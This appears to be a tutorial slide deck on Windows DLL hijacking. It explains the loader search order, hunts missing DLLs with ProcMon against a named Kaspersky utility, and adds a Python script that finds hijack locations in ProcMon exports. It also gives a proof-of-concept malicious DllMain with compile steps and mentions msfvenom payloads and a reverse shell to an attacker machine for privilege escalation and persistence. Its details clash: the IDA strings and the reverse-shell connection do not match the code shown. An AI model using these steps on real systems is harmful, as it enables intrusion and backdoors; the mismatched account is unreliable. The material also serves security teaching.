A DLL (Dynamic-Link Library) is Microsoft's implementation of the shared library concept. A DLL file contains code and data that several programs can use at the same time, which promotes code reuse and modularization. This brief tutorial gives an overview of Windows DLLs and how they are used.

A DLL contains functions, variables, resources and classes that an executable needs in order to run. For example:
KERNEL32.DLL – memory management, process and thread functions
USER32.DLL – user interface functions

To use these functions, the application has to import them. There are two ways an application imports functions from a module: Load-Time Dynamic Linking and Run-Time Dynamic Linking.

Load-Time Dynamic Linking: the application is linked at build time against an import library (".lib" with MSVC, ".a" with MinGW). The import library carries no code of its own; it tells the linker which DLL exports each function, and the Windows loader resolves those imports when the process starts, before the program's own code runs.

Run-Time Dynamic Linking: the application itself calls LoadLibrary() or LoadLibraryEx() with either a full path or a bare DLL name, and then GetProcAddress() to locate the function it wants.

In both cases, when the DLL is given by bare name rather than by a full path, the loader uses the DLL Search Order to locate it on the system. We'll see the DLL Search Order in the next few slides!
Step 1: Imposters, i.e. crackers, crack applications that are vulnerable to DLL hijacking.
Step 2: The victim downloads the cracked software, which ships with malicious DLLs.
Step 3: When the victim runs the program, the malicious DLL is loaded by the executable.
Step 4: The malicious DLL contains a reverse shell or any other arbitrary code, which is triggered with the privileges of the executable (elevated, if the application runs elevated).
Step 5: The attacker gets access to the victim's PC on his C2 server.
The DLL Search Order is what the loader follows to find DLLs requested by an application by name, without a full path. According to Microsoft's documentation, if SafeDllSearchMode is disabled the order is:
1. The directory from which the application loaded
2. The current directory
3. The system directory. GetSystemDirectory returns the path of this directory (typically C:\Windows\System32)
4. The 16-bit system directory. No function returns its path, but it is searched (typically C:\Windows\System)
5. The Windows directory. GetWindowsDirectory returns the path of this directory
6. The directories listed in the PATH environment variable

SafeDllSearchMode is enabled by default (since Windows XP SP2). With it enabled, the current directory drops to position 5, after the Windows directory, and the rest of the order is unchanged. Either way, every directory probed before the one that actually holds the DLL is a potential hijack location if the attacker can write to it.
DLL Hijacking is a technique for injecting malicious code into an application by exploiting missing DLLs and tricking the Windows search order. If an application requires a DLL for its functionality but that DLL does not exist, or is loaded in an insecure way (by bare name, with a directory a low-privileged user can write to earlier in the search order than the real DLL), there is a good chance of DLL hijacking. The attacker, either himself or by tricking the user, places a malicious DLL carrying the expected file name at the path the loader probes first (in the missing-DLL case, the first probed directory the attacker can write to). Whenever the application is executed, the loader picks up the malicious DLL instead, its DllMain runs inside the process, and code execution is achieved.
Once the malicious DLL is loaded, the attacker can execute arbitrary code to perform malicious actions. Persistence can also be achieved by using the hijacked DLL as a backdoor that runs every time the application starts. If the vulnerable application runs as Administrator (or as a service) while the hijack location is writable by a normal user, the attacker can escalate privileges from a normal user to Administrator. If the application runs as the same user who planted the DLL, there is no privilege gain, only code execution and persistence.
To find a DLL Hijacking vulnerability in any application, you'll need Process Monitor (ProcMon).
• ProcMon is a Sysinternals tool for Windows that records file system, registry, network and process activity in real time. You can call it Task Manager 2.0.
• Filter on the target process name with Operation is CreateFile, Result is NAME NOT FOUND and Path ends with .dll: every remaining row is a directory the loader probed for a DLL that was not there.
• For demonstrating this attack, we'll use a vulnerable version of kavremover.exe (support.kaspersky.com/downloads/utils/kavremover.exe).
• Let's see how to hunt this.
To build the malicious DLL we can use Metasploit (msfvenom can emit a payload in DLL format) or write our own code for the malicious actions. Now place this malicious DLL at the missing location, with exactly the file name the application asked for (in our case the DLL was missing from the Desktop, so we place the malicious DLL on the Desktop).
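The hunting step above and the search-order rules from the earlier slides can be automated. The script below is an added example written for this page, not code from the slides, from Sysinternals or from Kaspersky. It assumes the default column layout of a ProcMon CSV export (File > Save, CSV format), a caller-supplied list of directories the current user can write to, and constructed ProcMon rows; the DLL names helper.dll and missing.dll in those rows are hypothetical and say nothing about any real application. It reports, for every DLL the process asked for, where the loader finally found it (or that it was never found, a "phantom" DLL) and which user-writable directories were probed before that point, which is exactly the set of hijack locations; search_order() separately predicts the probe order for both SafeDllSearchMode settings so the ProcMon trace can be checked against it.

```python
"""Hunt DLL-hijack candidates in a Process Monitor (ProcMon) CSV export."""
from __future__ import annotations

import csv
import io
import ntpath

# Constructed ProcMon rows in the default export column layout. helper.dll and
# missing.dll are hypothetical names used only to exercise the code.
SAMPLE_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:00:01.0000000","kavremover.exe","4120","CreateFile","C:\Users\victim\Desktop\helper.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:00:01.0000010","kavremover.exe","4120","CreateFile","C:\Windows\System32\helper.dll","SUCCESS","Desired Access: Read Attributes"
"10:00:01.0000020","kavremover.exe","4120","CreateFile","C:\Users\victim\Desktop\missing.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:00:01.0000030","kavremover.exe","4120","CreateFile","C:\Windows\System32\missing.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:00:01.0000040","kavremover.exe","4120","CreateFile","C:\Windows\System\missing.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:00:01.0000050","kavremover.exe","4120","CreateFile","C:\Windows\missing.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:00:01.0000060","kavremover.exe","4120","CreateFile","C:\Tools\missing.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:00:01.0000070","explorer.exe","1234","CreateFile","C:\Users\victim\Desktop\other.dll","NAME NOT FOUND","Desired Access: Read Attributes"
'''


def dll_probes(procmon_csv: str, process_name: str) -> dict[str, list[tuple[str, str]]]:
    """Group the process's CreateFile probes for *.dll files by DLL name,
    keeping event order. Each entry is (full path, ProcMon Result)."""
    probes: dict[str, list[tuple[str, str]]] = {}
    for row in csv.DictReader(io.StringIO(procmon_csv)):
        if row["Process Name"].lower() != process_name.lower():
            continue
        if row["Operation"] != "CreateFile" or not row["Path"].lower().endswith(".dll"):
            continue
        name = ntpath.basename(row["Path"]).lower()
        probes.setdefault(name, []).append((row["Path"], row["Result"]))
    return probes


def classify(probes: dict[str, list[tuple[str, str]]], writable_dirs) -> dict[str, dict]:
    """For each DLL, report where the loader finally found it (None means a
    phantom DLL that exists nowhere) and the user-writable directories probed
    before that point. Any of those directories is a hijack location."""
    writable = {d.lower().rstrip("\\") for d in writable_dirs}
    report: dict[str, dict] = {}
    for name, events in probes.items():
        found_at = None
        hijackable: list[str] = []
        for path, result in events:
            if result == "SUCCESS":
                found_at = path  # legitimate DLL lives here; later probes never happen
                break
            directory = ntpath.dirname(path)
            if directory.lower().rstrip("\\") in writable and directory not in hijackable:
                hijackable.append(directory)
        report[name] = {"found_at": found_at, "hijackable_dirs": hijackable}
    return report


def search_order(app_dir, cwd, system_dir, windows_dir, path_dirs, safe_dll_search_mode=True):
    """Directories the loader probes for a DLL requested by bare name, in the
    documented order. With SafeDllSearchMode on (the default) the current
    directory is probed after the Windows directory instead of second."""
    sys16 = ntpath.join(windows_dir, "System")  # the 16-bit system directory
    if safe_dll_search_mode:
        head = [app_dir, system_dir, sys16, windows_dir, cwd]
    else:
        head = [app_dir, cwd, system_dir, sys16, windows_dir]
    return head + list(path_dirs)


def hunt(procmon_csv: str = SAMPLE_CSV, process: str = "kavremover.exe",
         writable_dirs=(r"C:\Users\victim\Desktop", r"C:\Tools")) -> dict[str, dict]:
    """End to end: parse the export and classify every DLL the process asked for."""
    return classify(dll_probes(procmon_csv, process), writable_dirs)


if __name__ == "__main__":
    for name, info in hunt().items():
        status = info["found_at"] or "NEVER FOUND (phantom DLL)"
        print(f"{name}: found at {status}; writable dirs probed first: {info['hijackable_dirs']}")
    print("Predicted probe order:",
          search_order(r"C:\Users\victim\Desktop", r"C:\Users\victim\Desktop",
                       r"C:\Windows\System32", r"C:\Windows", [r"C:\Tools"]))
```

Against a real trace, call hunt(open("Logfile.CSV").read(), "target.exe", writable_dirs=[...]) with the writable list taken from icacls or accesschk as the low-privileged user. A DLL that is found in System32 but probed in the application directory first is just as hijackable as a phantom DLL; the difference is only that a phantom DLL never needs the malicious copy to forward exports to the real library.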
The DLL can perform whatever actions we want. Here is the example code from HackTricks (https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dll-hijacking#your-own). To compile it with MinGW, run this from a shell that has g++ on its PATH (no administrator rights are needed): g++.exe dll.c -lws2_32 -o srrstr.dll --shared. The output name must match the DLL the target application is looking for; srrstr.dll is the name from the HackTricks example. This code runs Calculator and writes the output of ipconfig to C:\users\username\ipconfig.txt as a PoC (replace username with the real account name).

#include <windows.h>
#include <stdlib.h>   /* system() */

/* DllMain runs inside the victim process as soon as the loader maps the DLL,
 * so everything below executes with that process's privileges. */
BOOL WINAPI DllMain(HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    switch (dwReason) {
    case DLL_PROCESS_ATTACH:
        /* PoC payload: spawn cmd.exe via system() to drop ipconfig output,
         * then start Calculator as a visible sign the DLL was loaded. */
        system("ipconfig > C:\\users\\username\\ipconfig.txt");
        WinExec("calc.exe", 0);
        break;
    case DLL_PROCESS_DETACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
        break;
    }
    return TRUE;
}
We can also analyze the DLL in IDA, though we are not going to cover that in depth for now. If we load our DLL in IDA and click View -> Open Subview -> Strings, we get an idea of what the DLL contains. We can see "whoami > C:\\users\\india\\whoami.txt", the command that will be executed on the system, and "calc.exe" on the next line, the second program it launches.
Let's look at the running application in Process Explorer and see what we can find. An unknown child process, cmd.exe, has been created under kavremover, and the TCP/IP tab in the properties of that process shows a remote connection to 192.168.0.109 on port 4444, which is our attacker machine running the reverse shell listener!!
by Flaticon, infographics & images by Freepik Thanks! Do you have any queries? Twitter : @purab_parihar LinkedIn: linkedin.com/in/purabparihar Instagram: @purabparihar